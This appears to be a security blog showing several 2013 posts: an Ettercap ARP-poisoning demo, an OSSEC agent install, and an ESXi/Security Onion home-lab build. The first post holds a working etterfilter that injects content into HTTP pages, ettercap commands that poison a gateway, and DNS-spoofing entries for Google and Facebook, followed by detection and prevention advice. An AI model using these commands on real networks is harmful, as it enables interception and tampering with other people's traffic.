14 May, 2013

More Ettercap and ARP Poisoning

My previous post about Ettercap gets a lot of hits, so I thought I would take a deeper look at some of its features, with examples of usage. Before continuing, I'll point out a couple of other good resources, since some of my work builds on that of others.

Irongeek has a couple good pages dealing with Ettercap.

There is plenty more information if you search his site, plus a number of other sites and forums where you can find more.

I decided to show a couple of examples, then relate them to NSM and ways to detect ARP poisoning. I happen to be using FreeBSD as the attacking system in this case, and a Windows 7 system as the targeted system. For my experiment, I'll use the following image.



Here is the filter I used to replace the page title and body with my own title and body. It includes segments from Irongeek's filter, so I'll include the GPL notice.

############################################################################
#                                                                          #
#  nr.filter -- filter source file                                         #
#  Based on work by Irongeek and others http://www.irongeek.com/           #
#                                                                          #   
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {  
   if (search(DATA.data, "Accept-Encoding")) {  
    replace("Accept-Encoding", "Accept-Rubbish!");   
      # note: replacement string is same length as original string  
    msg("zapped Accept-Encoding!\n");  
   }  
   if (search(DATA.data, "gzip")) {  
    replace("gzip", "  ");  
    msg("whited out gzip!\n");  
   }  
 }  
 if (ip.proto == TCP && tcp.src == 80) {  
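   # note: the mixed-case tags injected below appear deliberate, so the
   # later replace() calls for "</title>" and "<body>" don't clobber
   # the tags this filter just inserted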
   replace("<title>", "<title>PWNED<\/tITle><bodY><p><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY6fyoF3OxiszT7_hlfbDGYC8_xkIGRrx3REa6_qTYPRHTwVKJzs_IJ1VuY2xbURrYeT84ni6fPKvPhI0WzKqxF64kU2gmsHGnZ_DoJYd8D4QtS8oGExr17GegwF5sZ9cTxO2ubcDB02yW/s400/pwned+DH.jpg"></p></boDY>");  
   replace("<TITLE>", "<title>PWNED<\/tITle><bodY><p><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY6fyoF3OxiszT7_hlfbDGYC8_xkIGRrx3REa6_qTYPRHTwVKJzs_IJ1VuY2xbURrYeT84ni6fPKvPhI0WzKqxF64kU2gmsHGnZ_DoJYd8D4QtS8oGExr17GegwF5sZ9cTxO2ubcDB02yW/s400/pwned+DH.jpg"></p></boDY>");  
   replace("</title>", " ");  
   replace("</TITLE>", " ");  
   replace("<body>", " ");  
   replace("<BODY>", " ");  
   msg("Filter Ran.\n");  
 }  
This filter replaces the opening "title" tag with a new title plus a body that links to the image. Then at the end of the filter, I replace the original page's closing title tag with a space, since I already closed the injected tag, and replace the original page's body tag with a space to eliminate the body of the page. I believe you could also use a pcre_regex command in the filter to more thoroughly remove the existing page body after inserting the image or other content of your choosing; a rough sketch follows. See the etterfilter manual page for more.
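Here is an untested sketch of that pcre_regex idea, assuming your Ettercap build was compiled with PCRE support; the pattern and replacement are illustrative only. Keep in mind that filters operate on individual packets, so a regex can only match content contained within a single packet.

if (ip.proto == TCP && tcp.src == 80) {
   # hypothetical, untested: gut an in-packet body in one pass (requires PCRE)
   if (pcre_regex(DATA.data, "<body>.+</body>")) {
      pcre_regex(DATA.data, "<body>.+</body>", "<bodY></boDY>");
      msg("regex-gutted a page body\n");
   }
}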

To compile the filter, I simply execute the following:
$ etterfilter nr.filter -o nr.ef

Then to run ettercap on a FreeBSD VM in this example, I execute the following:
$ sudo ettercap -i em0 -F nr.ef -T -M arp:remote /172.16.126.2/ /172.16.126.131/

The "-T" option is to use the text interface rather than the GUI or ncurses. The "-M" executes a man-in-the-middle with the arguments for ARP poisoning that includes the gateway, which is the first IP address in this case. The second IP address is a Windows system.

Here are some examples of the results when surfing with Chrome on the targeted Windows 7 system.

Notice the title is not changed on Slashdot, indicating they do not use a traditional HTML title tag. The body is also not replaced, just pushed down the page.
Here is what Google looks like.

Success.

Finally, here is my blog.

Success once again. Both the page title and body are replaced.
Another way to show how easy it is to redirect traffic to an unexpected site is with ettercap's DNS spoofing plugin. First, I edit /usr/local/share/ettercap/etter.dns and add the following lines.

facebook.com       A   216.34.181.45
*.facebook.com     A   216.34.181.45
www.facebook.com   PTR 216.34.181.45

google.com     A   131.253.33.200
*.google.com   A   131.253.33.200
www.google.com PTR 131.253.33.200

Then I run ettercap with the plugin enabled.
$ sudo ettercap -i em0 -P dns_spoof -T -M arp:remote /172.16.126.2/ /172.16.126.131/

This 20-second video shows what happens when I then try to go to Google or Facebook from the targeted system.


This can be fairly amusing, particularly on a lab network where shenanigans are not only acceptable but expected. On the other hand, imagine injecting something more malicious than a funny image, such as a malicious iframe or JavaScript. I played around with injecting JavaScript into pages, and it really is trivial if you're in a position to poison the network gateway. A good old-fashioned Rickroll is another good way to demonstrate the attack in a non-malicious way.

As I mentioned in a previous post about ettercap, the Metasploit site was briefly owned through ARP poisoning in 2008. It is an old-school attack that can still be quite effective if you have access to a system on the same network segment as your target.

Defenses against ARP poisoning are fairly simple to describe but not necessarily practical or easy to implement. The first, mentioned in the Metasploit article, is using static ARP tables so ARP requests over the network are no longer necessary. This may be simple in the case of a single gateway entry, but the larger the network, the more administrative overhead static ARP entries impose.
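For example, pinning the gateway's IP address to its real MAC address might look like the following on Linux and Windows hosts; the MAC here is a placeholder, and the gateway IP is the one from my lab setup.

# Linux: add a permanent ARP entry for the gateway
$ sudo arp -s 172.16.126.2 00:50:56:aa:bb:cc

# Windows (Vista/7 and later)
C:\> netsh interface ipv4 add neighbors "Local Area Connection" 172.16.126.2 00-50-56-aa-bb-cc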

You can also use software to detect ARP poisoning, for example LBNL's arpwatch. Any software that can show you MAC addresses along with IP addresses can potentially be used to detect poisoning since you would see the same IP address in use by multiple MAC addresses. For example, here is what my ARP poisoning with ettercap looks like in Wireshark.

You can see that the poisoner, 00:0c:29:6d:92:78, is associated with both IP addresses.
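Wireshark's ARP dissector also flags duplicate IP use on its own. If you have a capture file, something like the following tshark invocation should pull out those frames; the file name is a placeholder, and newer tshark versions use -Y rather than -R for display filters.

$ tshark -r poisoned.pcap -R "arp.duplicate-address-detected"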
So, it is easy to see in the traffic, but that doesn't mean it is necessarily easy to detect without some analyst intervention. Snort has an ARP spoofing preprocessor (a configuration sketch follows), but an IDS will often be in the wrong position on a network to see ARP traffic. In fact, most networks are probably not instrumented in such a way that a NSM sensor can see ARP traffic. That is not difficult in a technical sense, but it does require resources to deploy internal network sensors and to architect the network properly so the sensors have visibility. There are probably more efficient ways to allocate resources for detection in this case.
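For reference, enabling the preprocessor is a couple of lines in snort.conf; the IP and MAC below are placeholders for the gateway you want to watch.

preprocessor arpspoof
preprocessor arpspoof_detect_host: 172.16.126.2 00:50:56:aa:bb:cc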

There are still other methods to help detect and prevent ARP spoofing, particularly with network equipment like managed switches. Jeremy Stretch has a good write-up on DHCP Snooping and Dynamic ARP Inspection over at his PacketLife blog showing exactly how DAI can be used to prevent and detect ARP poisoning. You can also read about DHCP Snooping and DAI on Cisco's site. This seems like it may be an easier method than IDS deployment since networking equipment is already positioned to see ARP traffic, but it does require equipment that supports ARP inspection.
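As a rough sketch based on the Cisco documentation, turning this on for a VLAN looks something like the following; the VLAN number and interface are examples. ARP replies arriving on untrusted ports are then checked against the DHCP snooping binding table.

Switch(config)# ip dhcp snooping
Switch(config)# ip dhcp snooping vlan 10
Switch(config)# ip arp inspection vlan 10
Switch(config)# interface GigabitEthernet0/1
Switch(config-if)# ip dhcp snooping trust
Switch(config-if)# ip arp inspection trust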

I had originally thought of also showing how you could combine Ettercap with Metasploit to inject malicious traffic and more in the above examples, but I decided that would overly complicate this post. It is probably better reserved for a future post.

01 May, 2013

Installing OSSEC agent

With the recent news about the latest Apache backdoor on systems using cPanel, I thought it would be pertinent to show the process of adding an OSSEC agent that connects to a Security Onion server. Why is this relevant? Because OSSEC and other file integrity checkers can detect changes to binaries like Apache's httpd.

"OSSEC is an Open Source Host-based Intrusion Detection System that performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response."
Many systems include integrity checking programs in their default installs these days, for instance Red Hat with AIDE. AIDE is also available in repositories for a number of other Linux distributions plus FreeBSD.
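For example, a typical AIDE baseline-and-check cycle on Red Hat looks roughly like the following; database paths vary by distribution.

$ sudo aide --init
$ sudo mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz
$ sudo aide --check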

This case in particular would require using something other than the default options for integrity checking because cPanel installs Apache httpd in /usr/local/apache/bin, a non-standard directory that may not be automatically included when computing file hashes and doing subsequent integrity checks.

The reason I'm demonstrating OSSEC here is that it easily integrates with the Sguil console, and in Security Onion the sensors and server already have OSSEC configured to send alerts to Sguild. OSSEC also has additional functionality compared to AIDE. In this case, I'm installing the agent on a Slackware server.
$ wget http://www.ossec.net/files/ossec-hids-2.7.tar.gz

---snipped---

 $ openssl sha1 ossec-hids-2.7.tar.gz
SHA1(ossec-hids-2.7.tar.gz)= 721aa7649d5c1e37007b95a89e685af41a39da43
 $ tar xvzf ossec-hids-2.7.tar.gz

---snipped---

 $ sudo ./install.sh

  OSSEC HIDS v2.7 Installation Script - http://www.ossec.net

 You are about to start the installation process of the OSSEC HIDS.
 You must have a C compiler pre-installed in your system.
 If you have any questions or comments, please send an e-mail
 to dcid@ossec.net (or daniel.cid@gmail.com).

  - System: Linux webserver 3.8.4
  - User: root
  - Host: webserver
 
   -- Press ENTER to continue or Ctrl-C to abort. --

 
 1- What kind of installation do you want (server, agent, local, hybrid or help)? agent
 
  - Agent(client) installation chosen.

 2- Setting up the installation environment.

  - Choose where to install the OSSEC HIDS [/var/ossec]:
 
 3- Configuring the OSSEC HIDS.

   3.1- What's the IP Address or hostname of the OSSEC HIDS server?: 192.168.1.20
 
  - Adding Server IP 192.168.1.20

   3.2- Do you want to run the integrity check daemon? (y/n) [y]:

    - Running syscheck (integrity check daemon).

   3.3- Do you want to run the rootkit detection engine? (y/n) [y]:
 
 - Running rootcheck (rootkit detection).

   3.4 - Do you want to enable active response? (y/n) [y]:

3.5- Setting the configuration to analyze the following logs:
    -- /var/log/messages
    -- /var/log/auth.log
    -- /var/log/syslog
    -- /var/adm/syslog
    -- /var/adm/auth.log
    -- /var/adm/messages
    -- /var/log/xferlog
    -- /var/log/proftpd.log
    -- /var/log/apache/error_log (apache log)
    -- /var/log/apache/access_log (apache log)
    -- /var/log/httpd/error_log (apache log)
    -- /var/log/httpd/access_log (apache log)

  - If you want to monitor any other file, just change
   the ossec.conf and add a new localfile entry.
   Any questions about the configuration can be answered
   by visiting us online at http://www.ossec.net .

   --- Press ENTER to continue ---

---snip---

- Init script modified to start OSSEC HIDS during boot.
 - Configuration finished properly.
 - To start OSSEC HIDS:
                /var/ossec/bin/ossec-control start
 - To stop OSSEC HIDS:
                /var/ossec/bin/ossec-control stop
 - The configuration can be viewed or modified at /var/ossec/etc/ossec.conf

    Thanks for using the OSSEC HIDS.
    If you have any question, suggestion or if you find any bug,
    contact us at contact@ossec.net or using our public maillist at

    ossec-list@ossec.net
    ( http://www.ossec.net/main/support/ ).

    More information can be found at http://www.ossec.net

    ---  Press ENTER to finish (maybe more information below). ---

 - You first need to add this agent to the server so they 
   can communicate with each other. When you have done so,
   you can run the 'manage_agents' tool to import the 
   authentication key from the server.

   /var/ossec/bin/manage_agents

   More information at: 
   http://www.ossec.net/en/manual.html#ma

Next, I add the agent to my Security Onion server.
$ sudo /var/ossec/bin/manage_agents 

****************************************
* OSSEC HIDS v2.6 Agent manager.     *
* The following options are available: *
****************************************

   (A)dd an agent (A).
   (E)xtract key for an agent (E).
   (L)ist already added agents (L).
   (R)emove an agent (R).
   (Q)uit.

Choose your action: A,E,L,R or Q: A

- Adding a new agent (use '\q' to return to the main menu).

  Please provide the following:
   * A name for the new agent: webserver
   * The IP Address of the new agent: 192.168.1.5
   * An ID for the new agent[001]: 

Agent information:

   ID:001
   Name:webserver
   IP Address:192.168.1.5

Confirm adding it?(y/n): y

****************************************
* OSSEC HIDS v2.6 Agent manager.     *
* The following options are available: *
****************************************

   (A)dd an agent (A).
   (E)xtract key for an agent (E).
   (L)ist already added agents (L).
   (R)emove an agent (R).
   (Q)uit.

Choose your action: A,E,L,R or Q: e

Available agents: 

   ID: 001, Name: webserver, IP: 192.168.1.5

Provide the ID of the agent to extract the key (or '\q' to quit): 001

Agent key information for '001' is: 

---snip---

** Press ENTER to return to the main menu.

Now copy the key, go back to the web server, paste and import the key.
$ sudo /var/ossec/bin/manage_agents 

****************************************
* OSSEC HIDS v2.7 Agent manager.     *
* The following options are available: *
****************************************

   (I)mport key from the server (I).
   (Q)uit.

Choose your action: I or Q: i

* Provide the Key generated by the server.
* The best approach is to cut and paste it.
*** OBS: Do not include spaces or new lines.

Paste it here (or '\q' to quit): ---snip---

Agent information:
   ID:001
   Name:webserver
   IP Address:192.168.1.5

Confirm adding it?(y/n): y

If I were running a system with cPanel that was vulnerable to Cdorked.A, I would want to make sure OSSEC is monitoring the directories with the Apache httpd files. The default OSSEC configuration file from my recent install is /var/ossec/etc/ossec.conf, and the relevant lines are below:
<syscheck>
    <!-- Frequency that syscheck is executed - default to every 22 hours -->
    <frequency>79200</frequency>
    
    <!-- Directories to check  (perform all possible verifications) -->
    <directories check_all="yes">/etc,/usr/bin,/usr/sbin</directories>
    <directories check_all="yes">/bin,/sbin</directories>

So by default OSSEC would apparently not be checking the integrity of cPanel's Apache installation, and I would need to add /usr/local/apache to the directory checks.
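To cover it, I could add a line like the following to the <syscheck> section:

    <directories check_all="yes">/usr/local/apache</directories>

After making that change and any others for my particular system, I check the status of OSSEC and it is not yet running.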
$ sudo /etc/rc.d/rc.ossec status
ossec-logcollector not running...
ossec-syscheckd not running...
ossec-agentd not running...
ossec-execd not running...
$ sudo /etc/rc.d/rc.ossec start 
Starting OSSEC HIDS v2.7 (by Trend Micro Inc.)...
Started ossec-execd...
Started ossec-agentd...
Started ossec-logcollector...
Started ossec-syscheckd...
Completed.

Note that after installing the OSSEC agent on the remote system and adding it on the OSSEC server, you must restart ossec-hids-server in order for the ossec-remoted process to start listening on 1514/udp for remote agents.
$ sudo /etc/init.d/ossec-hids-server status
ossec-monitord is running...
ossec-logcollector is running...
ossec-remoted not running...
ossec-syscheckd is running...
ossec-analysisd is running...
ossec-maild not running...
ossec-execd is running...
$ sudo /etc/init.d/ossec-hids-server restart
Killing ossec-monitord .. 
Killing ossec-logcollector .. 
ossec-remoted not running ..
Killing ossec-syscheckd .. 
Killing ossec-analysisd .. 
ossec-maild not running ..
Killing ossec-execd .. 
OSSEC HIDS v2.6 Stopped
Starting OSSEC HIDS v2.6 (by Trend Micro Inc.)...
OSSEC analysisd: Testing rules failed. Configuration error. Exiting.
2013/04/30 23:13:59 ossec-maild: INFO: E-Mail notification disabled. Clean Exit.
Started ossec-maild...
Started ossec-execd...
Started ossec-analysisd...
Started ossec-logcollector...
Started ossec-remoted...
Started ossec-syscheckd...
Started ossec-monitord...
Completed.

$ sudo /etc/init.d/ossec-hids-server status
ossec-monitord is running...
ossec-logcollector is running...
ossec-remoted is running...
ossec-syscheckd is running...
ossec-analysisd is running...
ossec-maild not running...
ossec-execd is running...

$ netstat -l | grep 1514
udp        0      0 *:1514                  *:*    

Note the "Testing rules failed" error during the restart, which corresponds to the FAQ entry about getting an error when starting OSSEC. However, since I'm running OSSEC 2.7, that fix did not seem to apply. Poking around, I realized the ossec-logtest executable had not been copied to /var/ossec/bin when I ran the install script. After I manually copied it to that directory, restarting OSSEC no longer caused the "Testing rules failed" error.
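If you hit the same problem, copying the binary out of the build tree should work; the source path below matches my 2.7 tarball but may vary.

$ sudo cp ossec-hids-2.7/src/analysisd/ossec-logtest /var/ossec/bin/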

Once you have installed OSSEC on the system to be monitored, added the agent on the server, imported the key, restarted the server process, and started the agent, you will start getting alerts from the newly added system in Sguil. For example, the content of Sguil alerts will look like this after updating gcc:
Integrity checksum changed for: '/usr/bin/gcc'
Old md5sum was: '764a405824275d806ab5c441516b2d79'
New md5sum is : '6ab74628cd8a0cdf84bb3329333d936e'
Old sha1sum was: '230a4c09010f9527f2b3d6e25968d5c7c735eb4e'
New sha1sum is : 'b931ceb76570a9ac26f86c12168b109becee038b'

In the Sguil console, if I wanted to view all the recent OSSEC alerts I could perform a query as pictured below. Note you need to escape the brackets or remove them in favor of the MySQL wildcards '%%'.


Finally, to show an example of the various types of alerting that OSSEC can do in addition to checksum changes, here is a query and output directly from the MySQL console.
mysql> SELECT count(signature),signature FROM event WHERE signature LIKE '%%OSSEC%%' GROUP BY signature ORDER BY count(signature) DESC;
+------------------+---------------------------------------------------------------------------------------+
| count(signature) | signature                                                                             |
+------------------+---------------------------------------------------------------------------------------+
|              388 | [OSSEC] Integrity checksum changed.                                                   |
|              149 | [OSSEC] Host-based anomaly detection event (rootcheck).                               |
|               46 | [OSSEC] Integrity checksum changed again (2nd time).                                  |
|               39 | [OSSEC] IP Address black-listed by anti-spam (blocked).                               |
|               12 | [OSSEC] Integrity checksum changed again (3rd time).                                  |
|                4 | [OSSEC] Web server 400 error code.                                                    |
|                3 | [OSSEC] Receipent address must contain FQDN (504: Command parameter not implemented). |
+------------------+---------------------------------------------------------------------------------------+
7 rows in set (0.00 sec)
The highest count alert, plus the alerts indicating "2nd time" and "3rd time", are the basic functionality needed to detect changes to a file, my original use case. The "rootcheck" is alerting on files owned by root but writable by everyone. The balance of the alerts are from reading the system logs and detecting the system rejecting emails (anti-spam, 504) or web server error codes.

Back to the original problem of Cdorked.A, the blog posts on the subject also indicate that NSM could detect unusually long HTTP sessions, and there are no doubt other network behaviors that could be used to create signatures or network analytics resulting in detection. File integrity checks are just one possible way to detect a compromised server. Remember that you need known good checksums for this to work! Ideally, you install something like OSSEC before the system goes live on the network, or at the very least before it runs any listening services that could be compromised prior to computing the checksums.

22 April, 2013

Home Lab Part 2: VMware ESXi, Security Onion, and More

As I stated in my previous post about a new home lab configuration, I decided to try VMware ESXi 5.1 on my new Shuttle SH67H. ESXi is free for uses like this, presumably because it clearly benefits VMware if professionals can use it in a lab setting and that encourages use of their paid products in production. I have seen some conflicting accounts, but it appears that the main limit on the free version of ESXi 5.1 is 32GB of RAM.

I won't go into too much detail about the installation since it is adequately covered by a couple of other posts I found prior to purchasing my system.

I will mainly cover details that stood out and things I discovered as someone new to ESXi.

I had already planned to get a Shuttle for the small form factor, low noise, and low power usage. Finding out that the SH67H could be used as a white box for ESXi made it easy to pick an initial project once I built the system. (Okay, we could quibble over whether a Shuttle counts as a white box.) Additionally, since my previous home network sensor running Sguil had died, I figured that the first VM to build would be Security Onion but that I'd still be able to run multiple other VMs without impacting my home lab NSM.

Getting ESXi installed on the Shuttle was pretty simple. After booting to CD, I just followed the prompts and made sane choices. The one thing to note is that I installed ESXi to an external USB flash drive. Since the OS is so small, it gets loaded primarily to RAM at boot anyway. Using a flash drive has some advantages and some disadvantages, as shown in many discussions on the VMware and other discussion boards. For my home lab I decided to install to the flash drive, but chances are that it will actually make no difference to me. Some ESXi servers have no local storage, so I imagine it is particularly common for those systems to use a USB flash drive.

After using a directly connected keyboard and monitor, I moved the system into my home "server closet" and booted it headless. I installed the vSphere Client on my local Windows VM since I don't have a non-VM Windows installation. The vSphere Client was surprisingly easy to use; I might even go as far as to call it user-friendly. You can see in the screenshot below that it is relatively straightforward.
The error states "System logs on host vmshuttle are stored on non-persistent storage."
The first thing I noticed was that, because I installed ESXi to the flash drive, I got the error shown in the screenshot.

This error was only temporary. I am not sure exactly when it was resolved, most likely after a reboot or after I created the initial guest VM, but the system created a ".locker" directory in which I can clearly see all the logs. I am assuming they are persistent since vmstore0 is the internal 1TB hard drive, not the USB flash drive.

# cd /vmfs/volumes/vmstore0/
# ls -l .locker/
drwxr-xr-x    1 root     root           280 Apr  7 16:01 core
drwxr-xr-x    1 root     root           280 Apr  7 16:01 downloads
drwxr-xr-x    1 root     root          4340 Apr 16 02:15 log
drwxr-xr-x    1 root     root           420 Apr  7 16:01 var


I believe another option for fixing the error would be to manually set the scratch partition as detailed in VMware's Knowledge Base. Note that I haven't actually tried that to date.
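For reference, the Knowledge Base shows setting the scratch location from the host's command line, something like the line below with my datastore substituted in (untested by me); a reboot is required for it to take effect.

~ # vim-cmd hostsvc/advopt/update ScratchConfig.ConfiguredScratchLocation string /vmfs/volumes/vmstore0/.locker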

Before being able to SSH into the ESXi host and look at the above directories and files, I had to enable SSH. The configuration for SSH and a number of other security-related services is available in vSphere by highlighting the host (since in the workplace you may use vSphere to manage multiple ESXi systems), then going to the Configuration tab, Security Profile, and finally SSH Properties. If you haven't noticed already, ESXi defaults to using root for everything. I haven't yet investigated the feasibility of locking down the ESXi host, but I think it's safe to say most people will rely on keeping the host as isolated as possible since the host OS is not particularly flexible or configurable outside options VMware provides.
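For what it's worth, I believe the same service can also be toggled from the local ESXi Shell with vim-cmd, though I enabled SSH through vSphere.

~ # vim-cmd hostsvc/enable_ssh
~ # vim-cmd hostsvc/start_ssh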

I decided the best way to use vSphere would be to copy my Windows 7 VM from my laptop to the ESXi host. Trying to scp the VM then adding it to the inventory never worked properly. I had similar problems when trying to scp a CentOS VM from my laptop. When I tried browsing the datastore in vSphere and adding a local machine to the remote inventory, it would get partway through and then fail with an I/O error. I believe this was all actually a case of a flaky wireless access point, but even in cases where I successfully copied the CentOS VM I got errors when trying to add it to the inventory.

I eventually got it to work by converting the VM locally using ovftool, then deploying it to ESXi. OVF is the Open Virtualization Format, an open standard for packaging virtual machines. The syntax to convert an existing VM is simple. First, make sure the VM is powered down rather than just paused. On OS X running VMware Fusion, you can export a VM easily.

~ nr$ cd /Applications/VMware\ Fusion.app/Contents/Library/VMware\ OVF\ Tool/
~ nr$ ./ovftool -dm=thin ~/Documents/Virtual\ Machines.localized/Windows\ 7\ x64.vmwarevm/Windows\ 7\ x64.vmx ~/Documents/VM-OVF/Windows\ 7\ x64/Windows\ 7\ x64.ovf

After the conversion, the VM still needed to be exported to the ESXi host. I plugged my laptop into a wired connection to speed the process and eliminate any issues I was having over wireless, then sent the VM to ESXi. The options I used are to set the datastore, disk mode, and network.

~ nr$ ./ovftool -ds=vmstore0 -dm=thin --network="VM Network 2" ~/Documents/VM-OVF/Windows\ 7\ x64/Windows\ 7\ x64.ovf vi://192.168.1.10/

Once the VM is copied to the host, you will need to browse the datastore and add the VM to the ESXi inventory. Other ways to move a VM to ESXi are not endorsed by VMware. They officially recommend using OVF to import VMs.
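If you prefer the command line to the datastore browser, I believe registering an existing .vmx can also be done with vim-cmd; the path below matches my datastore layout.

~ # vim-cmd solo/registervm /vmfs/volumes/vmstore0/Windows\ 7\ x64/Windows\ 7\ x64.vmx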

All things considered, getting ESXi installed and configured was relatively easy. There are certainly drawbacks to using unsupported hardware. For example, vSphere does not display CPU temperature and other health or status information. I believe ESXi expects to use IPMI for hardware status like voltages, temperatures, and more. There are options to consider for anyone wanting a home lab using supported hardware. VMware maintains a lengthy HCL and I presume systems on their list support all the health status information in vSphere. I did find several possibilities to buy used servers like a Dell PowerEdge 2950 at reputable sites for about $650. Since I didn't want the noise, don't have a rack, and may not keep the system as a dedicated ESXi host, I did not go that route for a lab system.

Building a Security Onion VM


As stated, the first VM I built was Security Onion. I did this through the vSphere client and include some screenshots here. Most of this applies to building any VM using vSphere.

After choosing the option to create a new VM, I selected a custom configuration. I named the VM simply "Security Onion" and chose my only datastore, vmstore0, as the storage location. I am not concerned with backwards compatibility, so chose "Virtual Machine Version 8." I chose only one core and one socket for the CPU, but allocated 4GB of RAM since I knew the combination of Suricata, Bro, and other monitoring processes would eat a lot of RAM. I was installing 64-bit, so I chose 64-bit Ubuntu as the Linux version. 
Choosing the number of NICs, network, and adapter to use when initially configuring the VM
I selected two NICs, both using VMXNET 3, which was probably the first non-standard selection in my custom configuration. I wanted to make sure I had separate management and promiscuous mode NICs since this will be a sensor. VMXNET 3 should not be available as a choice if you selected a guest OS that doesn't support it earlier in the process.

I next chose the LSI Logic SAS for the SCSI Controller. Although I think it won't matter for Ubuntu, note the following from VMware's local help files.
"The LSI Logic Parallel adapter and the LSI Logic SAS adapter offer equivalent performance. Some guest operating system vendors are phasing our support for parallel SCSI in favor of SAS, so if your virtual machine and guest operating system support SAS, choose LSI SAS to maintain future compatibility."
This is a good time to point out that hitting the "Help" button in vSphere will open the local help files in your browser, and they contain actual useful information about the differences in choices when configuring the VM. In the case of the help button during the process of creating a new VM, it will actually open the specific page that is contextually useful for the options on the current step of the process. In general, both their help files and the Knowledge Base seem quite useful.

Finally, I created the virtual disk. This includes deciding whether to thin provision, thick provision lazy zeroed, or thick provision eager zeroed, meaning the disk is fully allocated and zeroed ahead of time. The documentation states that eager zeroed supports clustering for fault tolerance. I chose thick provisioning for my Security Onion VM since I knew with certainty that the virtual disk would get filled with NSM data like packet captures and logs. There are a number of KB and blog posts on the VMware site that detail advantages and disadvantages of the different provisioning methods.
The final settings for my Security Onion VM

Once the VM was configured on ESXi, I still needed to actually install Security Onion. You can do it the old-fashioned way by burning a disc and using the CD/DVD drive, but I mounted the ISO instead. To do this, you just start the VM, which doesn't yet have an OS, then open a console in vSphere and click the button to mount the ISO in the virtual CD drive so it boots to the disc image and starts the installation process. The vSphere console is a similar view and interface to Fusion or Workstation, and mounting the ISO works essentially the same way.

The time it took from hitting the button to create a VM to the time I had a running Security Onion sensor was quite short. I had a couple of small problems after the initial installation. First, in ESXi you have to manually edit the virtual switch security settings to allow the VM to sniff all the traffic. My sniffing interface was initially not seeing the traffic when I checked with tcpdump, which made me realize it was probably not yet in promiscuous mode.
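The setting lives under the vSwitch or port group security policy in vSphere; I believe the equivalent esxcli call in 5.1 looks like the following, with the vSwitch name as an example.

~ # esxcli network vswitch standard policy security set --vswitch-name=vSwitch1 --allow-promiscuous=true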

Second, the 4GB RAM and one CPU I had initially allocated was insufficient. When the sensor was running and I tried to update Ubuntu, the system became very unresponsive. I eventually doubled the RAM to 8GB and the number of cores to two, which resolved the issue. I think at this point that I could probably actually drop back down to 4GB of RAM, but since the system has 32GB I don't need to worry about it yet.

Other ESXi Notes


Although ESXi is stripped pretty bare of common Linux utilities and commands, there is plenty you can do from a command line through SSH instead of using vSphere. For example, to list all VMs on the system, power on my Windows 7 VM, and find the IP address so I can connect through RDP:

# vim-cmd vmsvc/getallvms
Vmid        Name                            File                           Guest OS       Version   Annotation
1      Security Onion   [vmstore0] Security Onion/Security Onion.vmx   ubuntu64Guest      vmx-08              
13     Windows 7 x64    [vmstore0] Windows 7 x64/Windows 7 x64.vmx     windows7_64Guest   vmx-09              
6      CentOS 64-bit    [vmstore0] CentOS 64-bit/CentOS 64-bit.vmx     centos64Guest      vmx-08 
~ # vim-cmd vmsvc/power.on 13
~ # vim-cmd vmsvc/get.guest 13 | grep -m 1 ipAddress
   ipAddress = "192.168.1.160",

I can get SMART information from my hard drive if needed.

~ # esxcli storage core device list
t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF
   Display Name: Local ATA Disk (t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF)
   Has Settable Display Name: true
   Size: 953869
   Device Type: Direct-Access 
   Multipath Plugin: NMP
   Devfs Path: /vmfs/devices/disks/t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF
   Vendor: ATA     
   Model: ST1000DM003-1CH1
   Revision: CC44
   SCSI Level: 5
   Is Pseudo: false
   Status: on
   Is RDM Capable: false
   Is Local: true
   Is Removable: false
   Is SSD: false
   Is Offline: false
   Is Perennially Reserved: false
   Queue Full Sample Size: 0
   Queue Full Threshold: 0
   Thin Provisioning Status: unknown
   Attached Filters: 
   VAAI Status: unknown
   Other UIDs: vml.01000000002020202020202020202020205a31443347484b46535431303030
   Is Local SAS Device: false
   Is Boot USB Device: false

~ # esxcli storage core device smart get -d t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF
Parameter                     Value  Threshold  Worst
----------------------------  -----  ---------  -----
Health Status                 OK     N/A        N/A  
Media Wearout Indicator       N/A    N/A        N/A  
Write Error Count             N/A    N/A        N/A  
Read Error Count              115    6          99   
Power-on Hours                100    0          100  
Power Cycle Count             100    20         100  
Reallocated Sector Count      100    10         100  
Raw Read Error Rate           115    6          99   
Drive Temperature             32     0          40   
Driver Rated Max Temperature  68     45         65   
Write Sectors TOT Count       200    0          200  
Read Sectors TOT Count        N/A    N/A        N/A  
Initial Bad Block Count       100    99         100  

There is a lot more you can do from the ESXi command line, but I should emphasize again that it is stripped fairly bare and lacks many of the commands you would expect coming from a Linux or Unix background. Even some of the utilities that are available do not have all the options or functionality you would expect. The CLI commands will generally list options or help when run without arguments. You can also get plenty of CLI documentation from VMware.


Next Steps


I now have a number of VMs installed, including a CentOS snapshot, FreeBSD, and my Windows 7 VM. My next steps will include setting up some VLANs to have some fun with a vulnerable network and an attacker network that will include Kali Linux. I am intimately familiar with Sguil and some of the other tools in Security Onion, but I also hope to dig into Suricata and Bro more than I have in the past.

I also hope that my lab will provide some interesting material for future blog posts.

04 April, 2013

New Home Lab Configuration

I received all my new equipment for my home lab a couple of days ago. After setting up the hardware in less than a day, I'm quite happy with it so far.

I was lucky enough to have two 12-year-olds assist me when I assembled the computer. This was their first time assembling a computer from parts and they really enjoyed it.

The first component was the Shuttle SH67H3. My friend Richard recommended the DS61, but I had two main problems with that barebones system. First, it only has two RAM slots for a maximum of 16GB. That's not bad, but I decided I wanted to get a desktop that supported more RAM without going to server components while keeping the form factor small. I actually may have a second system on my purchase list for sometime this year, and in that case I would definitely consider the DS61.

Second, I had read that the SH67H3 worked as an ESXi whitebox. Overall, I am a fan of Shuttle barebones. The SH67H3 is essentially the same chassis my coworkers and I used on our lab network at a previous job, just with a new motherboard and other improvements. I used very similar or identical parts for my Shuttle as the ones listed in the ESXi whitebox link above.

